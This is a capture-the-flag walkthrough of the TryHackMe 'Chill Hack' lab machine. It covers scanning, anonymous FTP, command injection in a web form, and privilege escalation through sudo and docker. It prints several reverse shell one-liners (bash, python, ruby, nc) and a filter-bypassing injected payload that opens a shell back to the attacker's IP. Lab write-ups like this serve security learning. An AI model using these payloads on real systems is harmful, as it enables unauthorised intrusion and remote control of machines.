# TryHackMe-Chill Hack
## NMAP
```
Nmap scan report for 10.10.244.249 [4/7]
Host is up (0.41s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 04:33 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.2.54.209
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
| 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.20 seconds
```
## PORT 80
## PORT 21
We see from the nmap results that `anonymous` login on ftp is enabled ,
We can only find a `note.txt` file
```
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
```
By reading this we can assume that there are two users `anurodh` and `appar`.
## Gobuster
Let's do a directory brute force on the web page
We are presented a page where we can input something and it's always good to try some system commands to check if there exists `RCE` (Remote Code Execution)
So I'll try running a command `pwd` which will print the current working directory
And it does work so let's try to input a reverse shell command so that we may get our intial foothold.But problem is that it's filtering the input so if we try to input something malicious it's going to filter that out like ruuning these reverse shells
```
bash -i >& /dev/tcp/10.2.54.209/2222 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
ruby -rsocket -e'f=TCPSocket.open("10.2.54.209",2222).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.2.54.209 4444
```
But if we combine commands togther like
`pwd;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 2222 >/tmp/f`
We are in the box as `www-data`
Running `sudo -l` will tell us that what we could run as other user or as root so in this case we run a file as user `apaar`
Now before running it let's see what the script does
So It's going to take two inputs first input `$person` would mean nothing it can be random string since it is only being printed another input `$msg` will goto a command `$msg 2>/dev/null` so we can try running a command like `cat local.txt` which is our user flag and it's going to redirect any output errors to null so basically we can run any command as user `apaar`
Try running `/bin/sh` to see if it get a shell as `appar`
Transfer `linpeas` on the box
Running linepeas I didn't find much but saw that there are two ports on localhost 3306 which is `mysql` and `9001` which we can acess through ssh portforwarding
Before doing that let's generate a public and private key for ssh for that use `ssh-keygen` then copy the contents of `id_rsa.pub` into `authorized_keys`
`ssh -L 9001:localhost:9001 apaar@10.10.165.124 -i id_rsa`
After doing that we can visit that port
Let's visit `var/www`
The step for ssh portforwarding wasn't needed as we could have just grab that picture or visted the page `/hacker.php` and it's uselsess to go for finding mysql username and password as it is just a rabbit hole I would say it was waste of time
Anyway,
And this archive is password protected so we have to use a password cracking tool , the one that I use is called `fcrackzip`
On reading that extract source code file we can fine a base64 enconded text which could be a user password
And we are now logged in as `anurodh` and we can see that this user is in the group of `docker`
Looking at privilege escalation for docker on `GTFOBINS`
We are root !!!